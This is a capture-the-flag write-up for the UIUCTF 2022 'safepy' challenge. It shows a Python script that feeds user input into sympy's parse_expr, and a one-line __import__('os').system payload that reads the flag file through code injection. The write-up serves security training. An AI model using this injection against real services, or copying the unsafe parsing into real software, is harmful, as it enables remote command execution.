Home UIUCTF 2022
Post
Cancel

UIUCTF 2022

Posted Aug 1, 2022
By Cerberus
1 min read

rev/safepy

Description: godlike snake with a nebula behind it and math equations floating around it

challenge file

Given python script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

from sympy import *


def parse(expr):
    # learned from our mistake... let's be safe now
    # https://stackoverflow.com/questions/33606667/from-string-to-sympy-expression
    # return sympify(expr)

    # https://docs.sympy.org/latest/modules/parsing.html
    return parse_expr(expr)


print('Welcome to the derivative (with respect to x) solver!')
user_input = input('Your expression: ')
expr = parse(user_input)
deriv = diff(expr, Symbol('x'))
print('The derivative of your expression is:')
print(deriv)

This issue in github shows the vulnerability in parse_expr.

vulnerable explanation

payload:

1

__import__("os").system("cd / && cat flag")

Output

1
2
3
4
5
6
7

== proof-of-work: disabled ==
Welcome to the derivative (with respect to x) solver!
Your expression: __import__("os").system("cd / && cat flag")
uiuctf{na1v3_0r_mal1ci0u5_chang3?}

The derivative of your expression is:
0

flag:uiuctf{na1v3_0r_mal1ci0u5_chang3?}

writeups, UIUCTF 2022
python pyjail
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Trending Tags
python pyjail crypto git LFI PHP RCE
Contents
Trending Tags
python pyjail crypto git LFI PHP RCE